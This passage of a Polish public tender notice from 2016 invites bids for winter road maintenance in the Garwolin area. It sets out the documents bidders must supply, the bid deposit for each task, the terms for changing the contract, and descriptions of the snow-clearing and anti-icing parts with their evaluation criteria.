c) Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w lit a), składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
d) Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa w lit. c), zastępuje się je dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby  wystawionym nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (spółki cywilne, konsorcja) dokumenty i oświadczenia określone w lit a) - d) składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej zamawiający będzie żądał:
a) wykaz usług, o których mowa w pkt V.2.1) SIWZ, wykonanych a w przypadku świadczeń okresowych lub ciągłych również wykonywanych w okresie ostatnich 3 lat przed upływem terminu składania ofert,  a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie,  co najmniej dwóch usług (zimowe odśnieżanie dróg), wraz z podaniem rodzaju, wartości, daty, miejsca  wykonania i podmiotów, na rzecz których usługi te zostały wykonane, z załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie - załącznik Nr 2 dla zadania I  XV,
b) wykaz osób skierowanych przez wykonawcę do realizacji zmówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień niezbędnych do wykonania zamówienia, a także zakresu wykonywanych 
przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - załącznik Nr 3 dla zadania I  XV,
c) wykaz (transportu) narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia wraz z informacją do dysponowania tymi zasobami - załącznik Nr 4 dla zadania I  XV,
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Ponadto, oprócz oświadczeń stanowiących wstępne potwierdzenie, że Wykonawca: nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu, Wykonawca obowiązany jest dołączyć do oferty:
1) Formularz ofertowy sporządzony na załączonym druku, zawierający w szczególności; wskazanie oferowanego przedmiotu zamówienia, łączną cenę ofertową brutto, zobowiązanie dotyczące terminu realizacji zamówienia, okresu gwarancji i warunków płatności, oświadczenie o okresie związania ofertą oraz o akceptacji wszystkich postanowień SIWZ i wzoru umowy bez zastrzeżeń, a także informację którą część zamówienia wykonawca zamierza powierzyć podwykonawcy.
2) Wypełniony formularz Kosztorysu ofertowego z wartością robót stanowiącą cenę ofertową zamówienia, która stanowi kwota brutto (tj. netto + podatek VAT zgodny z obowiązującymi przepisami prawa).
3) Wskazanie części zamówienia publicznego, której wykonanie Wykonawca powierzy podwykonawcom  - na załączniku Nr 5 dla zadania (I-XV)
4) Kopia dokumentu wadialnego dla zadań I, II, IV- XIV,
5) zobowiązanie lub inne dokumenty podmiotów do oddania wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia - w przypadku, gdy Wykonawca polega na zdolnościach innych podmiotów.
6)  w przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia, do oferty należy załączyć dokument ustanawiający pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego zgodnie z art. 23 ust. 1 i 2 ustawy Prawo zamówień publicznych.
7) w przypadku, gdy ofertę w imieniu wykonawcy podpisuje pełnomocnik, do oferty należy załączyć pełnomocnictwo określające jego zakres i podpisane przez osoby uprawnione do reprezentacji wykonawcy.
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />Warunkiem uczestnictwa w przetargu jest wniesienie wadium:
Zamawiający wymaga wniesienia wadium dla zadania I, w wysokości;
3 346zł (słownie: trzy tysiące trzysta czterdzieści sześć złotych )
Zamawiający wymaga wniesienia wadium dla zadania II, 
w wysokości; 561zł (słownie: pięćset sześćdziesiąt jeden złotych )
Zamawiający nie wymaga wniesienia wadium dla zadania  III 
Zamawiający wymaga wniesienia wadium dla zadania IV, 
w wysokości; 272,50zł (słownie: dwieście siedemdziesiąt dwa złote 50/100)
Zamawiający wymaga wniesienia wadium dla zadania V, 
w wysokości; 412,69zł (słownie: czterysta dwanaście złotych 69/100)
Zamawiający wymaga wniesienia wadium dla zadania VI, 
w wysokości; 344,79zł (słownie: trzysta czterdzieści cztery złote 79/100)
Zamawiający wymaga wniesienia wadium dla zadania VII, 
w wysokości; 429,28zł (słownie: czterysta dwadzieścia dziewięć złotych 28/100)
Zamawiający wymaga wniesienia wadium dla zadania VIII, 
w wysokości; 630,82zł (słownie: sześćset trzydzieści złotych 82/100)
Zamawiający wymaga wniesienia wadium dla zadania IX, 
w wysokości; 364,70zł (słownie: trzysta sześćdziesiąt cztery złote 70/100)
Zamawiający wymaga wniesienia wadium dla zadania X, 
w wysokości; 357zł (słownie: trzysta pięćdziesiąt siedem złotych)
Zamawiający wymaga wniesienia wadium dla zadania XI, 
w wysokości;  360,30zł (słownie: trzysta sześćdziesiąt złotych 30/100)
Zamawiający wymaga wniesienia wadium dla zadania XII, 
w wysokości;  356,50zł (słownie: trzysta pięćdziesiąt sześć złotych 50/100)
Zamawiający wymaga wniesienia wadium dla zadania XIII, 
w wysokości; 333zł (słownie: trzysta trzydzieści trzy)
Zamawiający wymaga wniesienia wadium dla zadania XIV,
w wysokości;  414zł (słownie: czterysta czternaście złotych) 
Zamawiający nie wymaga wniesienia wadium dla zadania  XV</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td></td><td></td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1. Zmiany i uzupełnienia treści umowy wymagają dla swej ważności formy pisemnej.
2. Zamawiający zgodnie z art. 144 ustawy Prawo zamówień publicznych przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, w następującym zakresie;
1) zmianie wynagrodzenia w przypadku gdy zmianie ulegnie stawka podatku VAT - wynagrodzenie ulegnie zmianie w ten sposób, że wynagrodzenie netto pozostanie takie samo, a wartość podatku VAT i wynagrodzenie brutto ulegną zmianie, co wymaga zawarcia stosownego aneksu., 
2) wynagrodzenia należnego wykonawcy (przy utrzymaniu cen jednostkowych za 1 godz. i/lub
1 km wykonywania usługi określonej w kosztorysie ofertowym z przyczyn wymienionych w Instrukcji dla Oferentów pkt. XX, 3.
3. Przy długotrwale utrzymujących się, niesprzyjających warunkach atmosferycznych, powodujących konieczności wykonania usług w zakresie zimowego utrzymania dróg czego nie można było przewidzieć na etapie przygotowywania postępowania o udzielenie zamówienia. 
Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie, w formie aneksu do umowy, pod rygorem nieważności takiej zmiany.<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 29/09/2016, godzina: 11:30,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Zwalczanie śliskości zimowej na drogach  teren działalności Służby Drogowo  Mostowej w Garwolinie, Służby Drogowej w Trojanowie, Służby Drogowej w Maciejowicach<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zwalczanie śliskości zimowej na drogach  teren działalności Służby Drogowo  Mostowej w Garwolinie, Służby Drogowej w Trojanowie, Służby Drogowej w Maciejowicach przy użyciu; Samochodów ciężarowych z pługami do odśnieżania (Wykonawcy) w ilości 6 szt. + ładowarki do załadunku materiałów uszorstniających na; piaskarki ECOS 40-36 DAT - 3 szt., Krokus model Solka - 1 szt., Schmidt NIDO 90  1szt., i Dandrob P  1 3D  1 szt, (Zamawiającego) wraz z załadunkiem mieszanki piaskowo-solnej na piaskarkę przez Wykonawcę. 
Długość dróg do zwalczania śliskości zimowej km  117,822
Mieszankę piaskowo-solną zabezpiecza Zamawiający.
Ilość godzin w sezonie zimowym 2016/2017 i w sezonie zimowym 2017/2018   2 800 godz. 
Uwaga!
Pojazdy wykonawcy powinny być wyposażone w system lokalizacji pojazdu.
  Wykonawca w okresie obowiązywania umowy zapewni Zamawiającemu całodobowy dostęp do aplikacji, umożliwiającej podgląd aktualnej pozycji na mapie wszystkich pojazdów, przeznaczonych do zwalczania śliskości zimowej na drogach w ramach przedmiotowego postepowania o udzielenie zamówienia. 
Zamawiający korzystał będzie z systemu pomocniczo do kontroli pracy wykonywanej przez wykonawcę.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90630000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/05/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Czas podstawienia sprzętu</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Odśnieżanie dróg samochodami ciężarowym o ładowności od 7 ton Wykonawcy z pługiem odśnieżnym Zamawiającego OZ-W32 szt. 1 i OZ-BR 32  szt. 1 na terenie działalności Służby Drogowo  Mostowej w Garwolinie w ilości szt. 2<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Odśnieżanie dróg samochodami ciężarowym o ładowności od 7 ton Wykonawcy z pługiem odśnieżnym Zamawiającego OZ-W32 szt. 1 i OZ-BR 32  szt. 1 na terenie działalności Służby Drogowo  Mostowej w Garwolinie w ilości szt. 2
Długość dróg przewidzianych do odśnieżania km  190,726 km                               
Ilość km w sezonie zimowym 2016/2017 i w sezonie zimowym 2017/2018  1 700 km
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/05/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Czas podstawienia sprzętu</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Odśnieżanie dróg samochodem ciężarowym o ładowności od 7 ton Wykonawcy z pługiem odśnieżnym Zamawiającego OZ-W32 szt. 1, na terenie działalności Służby Drogowej w Trojanowie.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Odśnieżanie dróg samochodem ciężarowym o ładowności od 7 ton Wykonawcy z pługiem odśnieżnym Zamawiającego OZ-W32 szt. 1 na terenie działalności Służby Drogowej 
w Trojanowie.
Długość dróg przewidzianych do odśnieżania km  164,186 km          
Ilość km w sezonie zimowym 2016/2017 i w sezonie zimowym 2017/2018  1 000 km
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/05/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Czas podstawienia sprzętu</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>Odśnieżanie dróg samochodem ciężarowym o ładowności od 7 ton Wykonawcy z pługiem odśnieżnym Zamawiającego AC-W32 szt. 1 na terenie działalności Służby Drogowej w Maciejowicach<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Odśnieżanie dróg samochodem ciężarowym o ładowności od 7 ton Wykonawcy z pługiem odśnieżnym Zamawiającego AC-W32 szt. 1 na terenie działalności Służby Drogowej 
w Maciejowicach 
Długość dróg przewidzianych do odśnieżania km  173,340 km    
Ilość km w sezonie zimowym 2016/2017 i w sezonie zimowym 2017/2018  1 000 km
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/05/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Czas podstawienia sprzętu</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>5
                  
                <b>Nazwa: </b>Odśnieżanie dróg ciągnikami rolniczymi lub inną maszyną  na przykład budowlaną z napędem na jedną lub więcej osi o mocy od 80KM do 100KM oraz pługiem do odśnieżania   teren działalności Służby Drogowo  Mostowej w Garwolinie w ilości szt. 2<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Odśnieżanie dróg ciągnikami rolniczymi lub inną maszyną  na przykład budowlaną z napędem na jedną lub więcej osi o mocy od 80KM do 100KM oraz pługiem do odśnieżania   teren działalności Służby Drogowo  Mostowej 
w Garwolinie w ilości szt. 2
Ilość km w sezonie zimowym 2016/2017 i w sezonie zimowym 2017/2018  1350 km, 
Ilość godzin w sezonie zimowym 2016/2017 i w sezonie zimowym 2017/2018  70 godz
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/04/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Czas podstawienia sprzętu</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>6
                  
                <b>Nazwa: </b>Odśnieżanie i zwalczanie naboju lodowego przy użyciu ciągnika rolniczego lub inną maszyną  na przykład budowlaną z pługiem do odśnieżania o mocy powyżej 100KM do 150KM, z napędem 4x4, będącego własnością Wykonawcy teren działalności Służby Drogowo  Mostowej w Garwolinie w ilości szt. 1<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Odśnieżanie i zwalczanie naboju lodowego przy użyciu ciągnika rolniczego lub inną maszyną na przykład budowlaną z pługiem do odśnieżania o mocy powyżej 100KM do 150KM, z napędem 4x4, będącego własnością Wykonawcy teren działalności Służby Drogowo  Mostowej w Garwolinie w ilości szt. 1 
Ilość km w sezonie zimowym 2016/2017 i w sezonie zimowym 2017/2018  950km, 
Ilość godzin w sezonie zimowym 2016/2017 i w sezonie zimowym 2017/2018  70 godz.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/04/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Czas podstawienia sprzętu</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>7
                  
                <b>Nazwa: </b>Odśnieżanie i zwalczanie naboju lodowego przy użyciu ciągnika rolniczego lub inną maszyną  na przykład budowlaną z pługiem do odśnieżania o mocy powyżej 150KM, z napędem 4x4, o masie minimum 7 ton będącego własnością Wykonawcy teren działalności Służby Drogowo  Mostowej w Garwolinie w ilości szt. 1<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Odśnieżanie i zwalczanie naboju lodowego przy użyciu ciągnika rolniczego lub inną maszyną  na przykład budowlaną z pługiem do odśnieżania o mocy powyżej 150KM, z napędem 4x4, o masie minimum 7 ton będącego własnością Wykonawcy teren działalności Służby Drogowo  Mostowej w Garwolinie w ilości szt. 1
Ilość km w sezonie zimowym 2016/2017 w sezonie zimowym 2017/2018 850 km,
Ilość godzin w sezonie zimowym 2016/2017 i w sezonie zimowym 2017/2018  70 godz. 
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
